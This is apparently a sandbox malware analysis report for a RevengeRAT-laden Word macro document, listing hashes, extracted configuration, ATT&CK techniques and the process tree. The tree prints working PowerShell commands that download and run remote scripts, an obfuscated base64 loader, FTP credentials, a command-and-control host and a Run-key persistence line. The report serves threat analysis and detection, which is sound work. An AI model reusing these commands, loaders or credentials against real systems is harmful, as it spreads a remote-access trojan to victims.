revengerat | 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23/09/2024, 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Size

124KB
MD5

cc0f9cc1f9133b0f5dd045a34b2d7ae1
SHA1

c41f1c79442c0e2b717473f9c40d395176afffdb
SHA256

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696
SHA512

154c2ddc43ba72e1f166dc025e20ef5c580e1f490f1828496c1f10f8ef17b4432137740c66552d12cb647499e9ad7d5a62e5ab709ed2bcd9d08d2416b475c3da
SSDEEP

1536:vkc9anle9tQVTGH7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBXFtc:vVWqQVtClwH9r0l77AnsSmy/BVtqxp

Score

10^/10

revengerat nyancatrevenge defense_evasion discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

revengerat

Botnet

NyanCatRevenge

marcelotatuape.ddns.net:333

Mutex

b25e533944db469

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3640	1624	powershell.exe	81

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
55	3640	powershell.exe
57	3640	powershell.exe
61	4320	powershell.exe
63	4320	powershell.exe
65	4320	powershell.exe
68	4320	powershell.exe
70	4320	powershell.exe
71	4320	powershell.exe
74	568	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_r = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\lngbo.ps1' \";exit"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
64	powershell.exe
4320	powershell.exe
3592	powershell.exe
568	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
73	pastebin.com
74	pastebin.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 568 set thread context of 1996	568	powershell.exe	106

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1624	WINWORD.EXE
1624	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3640	powershell.exe
3640	powershell.exe
64	powershell.exe
64	powershell.exe
4320	powershell.exe
4320	powershell.exe
4320	powershell.exe
3592	powershell.exe
3592	powershell.exe
568	powershell.exe
568	powershell.exe
568	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	4320	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1624	WINWORD.EXE
1624	WINWORD.EXE
1624	WINWORD.EXE
1624	WINWORD.EXE
1624	WINWORD.EXE
1624	WINWORD.EXE
1624	WINWORD.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 3640	1624	WINWORD.EXE	94
PID 1624 wrote to memory of 3640	1624	WINWORD.EXE	94
PID 3640 wrote to memory of 1964	3640	powershell.exe	97
PID 3640 wrote to memory of 1964	3640	powershell.exe	97
PID 4316 wrote to memory of 2076	4316	explorer.exe	99
PID 4316 wrote to memory of 2076	4316	explorer.exe	99
PID 2076 wrote to memory of 64	2076	WScript.exe	100
PID 2076 wrote to memory of 64	2076	WScript.exe	100
PID 64 wrote to memory of 4320	64	powershell.exe	102
PID 64 wrote to memory of 4320	64	powershell.exe	102
PID 4320 wrote to memory of 3592	4320	powershell.exe	103
PID 4320 wrote to memory of 3592	4320	powershell.exe	103
PID 4320 wrote to memory of 568	4320	powershell.exe	104
PID 4320 wrote to memory of 568	4320	powershell.exe	104
PID 4320 wrote to memory of 3684	4320	powershell.exe	105
PID 4320 wrote to memory of 3684	4320	powershell.exe	105
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106
PID 568 wrote to memory of 1996	568	powershell.exe	106

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3640
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe" test.js
    3⤵
    PID:1964

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4316
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAFIAeg㍿XAFcAcgAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAFIAeg㍿XAFcAcgAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿SAHoAVw㍿XAHIALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAFIAeg㍿XAFcAcgAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿TAHQAcg㍿pAG4AZwAoACAAJw㍿mAHQAcAA6AC8ALw㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0ADEAQA㍿mAHQAcAAuAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQALg㍿jAG8AbQAuAGIAcgAvAFUAcA㍿jAHIAeQ㍿wAHQAZQ㍿yAC8AMAAyAC8ARA㍿MAEwAMAAxAC4AdA㍿4AHQAJwAgACkAOwAkAFIAeg㍿XAFcAcgAuAGQAaQ㍿zAHAAbw㍿zAGUAKAApADsAJA㍿SAHoAVw㍿XAHIAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿SAHoAVw㍿XAHIALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAA7ACQAVg㍿0AGEAQQ㍿GACAAPQAgACQAUg㍿6AFcAVw㍿yAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAgACkAOw㍿bAEIAeQ㍿0AGUAWw㍿dAF0AIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQw㍿vAG4Adg㍿lAHIAdA㍿dADoAOg㍿GAHIAbw㍿tAEIAYQ㍿zAGUANgA0AFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAuAFIAZQ㍿wAGwAYQ㍿jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw㍿TAHkAcw㍿0AGUAbQAuAEEAcA㍿wAEQAbw㍿tAGEAaQ㍿uAF0AOgA6AEMAdQ㍿yAHIAZQ㍿uAHQARA㍿vAG0AYQ㍿pAG4ALg㍿MAG8AYQ㍿kACgAIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgACkALg㍿HAGUAdA㍿UAHkAcA㍿lACgAIAAnAEMAbA㍿hAHMAcw㍿MAGkAYg㍿yAGEAcg㍿5ADMALg㍿DAGwAYQ㍿zAHMAMQAnACAAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAIAAnAHAAcg㍿GAFYASQAnACAAKQAuAEkAbg㍿2AG8Aaw㍿lACgAJA㍿uAHUAbA㍿sACwAIA㍿bAG8AYg㍿qAGUAYw㍿0AFsAXQ㍿dACAAKAAgACcAMgAyACUAOQA2AGMAOAA1ADMANgA1ADYAYgAwADYAYQA1ADYAOA㍿kAGIAMg㍿jADIAMQ㍿hAGUANg㍿jAGIAYgAyADEANQ㍿iADIAMgAlAD0AdgAmAGQAYQ㍿vAGwAbg㍿3AG8AZAA9AGUAYw㍿yAHUAbw㍿zACYAdA㍿4AHQALg㍿0AHgAdAA3ADIAJQA3ADIAJQA4AC0ARg㍿UAFUARAAzACUAQQAyACUAZQ㍿tAGEAbg㍿lAGwAaQ㍿mACsAQgAzACUAMgAyACUAdA㍿4AHQALg㍿0AHgAdAAyADIAJQ㍿EADMAJQ㍿lAG0AYQ㍿uAGUAbA㍿pAGYAKw㍿CADMAJQ㍿0AG4AZQ㍿tAGgAYw㍿hAHQAdA㍿hAD0Abg㍿vAGkAdA㍿pAHMAbw㍿wAHMAaQ㍿kAC0AdA㍿uAGUAdA㍿uAG8AYwAtAGUAcw㍿uAG8AcA㍿zAGUAcgA/AHQAeA㍿0AC4AYwA4ADgANgA3ADAANQAwADAANAA1AGMALQAwAGMANw㍿hAC0AMgA4ADkANAAtAGIAMg㍿hADIALQA2ADMAOQAxAGUAZAAyAGQALw㍿nAHAARQ㍿XAEoAdQ㍿RAHgALw㍿zAG0AZQ㍿0AGkALw㍿tAG8AYwAuAHQAaA㍿nAGkAegAuAG4AZA㍿jAC4AMA㍿uAC4AMQ㍿yAHQALgA3AHAALwAvADoAcw㍿wAHQAdA㍿oACcAIAAsACAAJwAlAEQAQw㍿QAEoAVQAlACcALAAgACcAdA㍿yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:64
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$RzWWr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $RzWWr.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$RzWWr.dispose();$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $RzWWr.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\lngbo.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1996
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
        5⤵
        
        PID:3684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\lngbo.ps1

Filesize
132KB

MD5
5d6acf998701782dbc41e3cca20839ae

SHA1
8fa365fd0df099df35d06bc9178d435ad2a9f472

SHA256
e9732ebc6fee2eee5b41a6ab019c68acf833204545cfe8e51b9f5df910e9c40f

SHA512
9da884483ae247825a9c5cca776cfe8674efae433ad82d17bbcef21349be1e9c51ca0101c5858be0deee5f1ccb72042ddecbfbd2523c34ab617cad15cb10fe93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
334B

MD5
80df14ed28f6bdea4bd049a6d865b97e

SHA1
715dca5ecc3260c153d5e953cdc45be5a98e24b6

SHA256
4ae4ca4102c4a50bad8663d8e1911a2b5c6c4eb8ebc7dcb46bf77418efddec16

SHA512
8bfd60b774c966c8db42d0f66d9e1f13d074c201bbaf68b7c09f547485043033372e19696b53a82e5c6ee8eb2aad0a07173dd5ae58058f17bc574c57035a52e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c1fca2f86da013ab0bebd174f313ee72

SHA1
d6b6a8f5d6d9979893254cea76f7031ba5438391

SHA256
79f112792c2d79cd64d73d4510168f0dbe7d5a40877c6c305863c0a473dc01f9

SHA512
e5f2f2a6f4387d857b72cc44351e3e63b4d04958af6a269502f6ae5e5d68a5f9c3d9c9457dd1cbc99e080f858697df7430bed130b009f6fc133dbadf1df758be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
87441260b5caf10b43d9846ab2240740

SHA1
f28038d1042410969b1b15aee5dd5f1ef6632688

SHA256
186739f88588b68b398f84fd90e920e8faa68306e582970256572573595b4610

SHA512
08fecb974f914e8b4ca37abcefb5a1473c9eb6ac558477ab94895ce19b20c7228807ecee1282cf21f1282cafd8d2a50ea06935b12488345204e5d201b651fefc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pek3zzi.rpo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
